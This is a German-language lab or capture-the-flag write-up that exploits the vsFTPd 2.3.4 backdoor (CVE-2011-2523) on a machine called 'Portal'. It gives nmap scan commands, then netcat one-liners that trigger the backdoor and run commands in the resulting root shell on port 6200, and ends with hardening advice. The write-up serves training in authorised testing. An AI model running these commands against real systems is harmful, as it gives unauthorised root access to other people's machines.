
Eine detaillierte Penetrationstest-Durchführung und Exploit-Bericht für die 'Portal'-Maschine, mit Fokus auf CVE-2011-2523 (vsFTPd 2.3.4 Backdoor), um Root-Zugriff zu erlangen.
⚠️ Dieses Projekt ist ausschließlich zu Bildungs- und autorisierten Testzwecken bestimmt.
Unbefugter Zugriff auf Systeme ist strengstens untersagt.
SYAFIQ
Rolle: Leitender Penetrationstester
| Phase | Werkzeug | Beschreibung |
|---|---|---|
| Erkundung | Nmap | Netzwerk nach aktiven Hosts scannen |
| Aufzählung | Nmap | Dienste und Versionen identifizieren |
| Analyse | NSE-Skript | Bekannte Schwachstelle erkennen |
| Ausnutzung | Netcat | Backdoor auslösen |
| Post-Exploitation | Terminal | Root-Zugriff erlangen und Flagge abrufen |
Nach aktiven Hosts im Netzwerk scannen:
nmap -sn --unprivileged 10.150.150.10-30
✅ Ergebnis:
-8 Hosts erkannt -Ziel identifiziert: 10.150.150.12
Offene Ports und Dienste scannen:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ Ergebnisse:
-Port 21 → FTP (vsftpd) -Port 22 → SSH (OpenSSH 8.2p1)
Auf bekannte FTP-Backdoor-Schwachstelle prüfen:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 Ergebnis:
-Ziel ist VERWUNDBAR -CVE-2011-2523 bestätigt
Backdoor mit bösartigem Benutzernamen auslösen:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ Dies öffnet eine versteckte Root-Shell auf Port 6200
Mit der Backdoor verbinden und Befehle ausführen:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
Root-Zugriff erlangt uid=0(root) bestätigt
🏁 Flagge erbeutet:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
Immer veraltete Dienste aktualisieren (vsFTPd war verwundbar) Fehlkonfigurierte Dienste können zur vollständigen Systemkompromittierung führen Einfache Scans können kritische Schwachstellen aufdecken -🛡️ Empfehlungen -🔄 FTP-Dienst auf die neueste Version aktualisieren -🚫 Unnötige Dienste deaktivieren -🔐 Firewall verwenden, um Zugriff einzuschränken -📊 Regelmäßige Sicherheitsaudits durchführen -📚 Haftungsausschluss
Cybersicherheit lernen Ethische Hacking-Übungen Autorisierte Penetrationstests
❌ Verwenden Sie dieses Wissen NICHT für illegale Aktivitäten.
“Sicherheit ist kein Produkt, sondern ein Prozess.” — Testen, überwachen und verbessern Sie immer.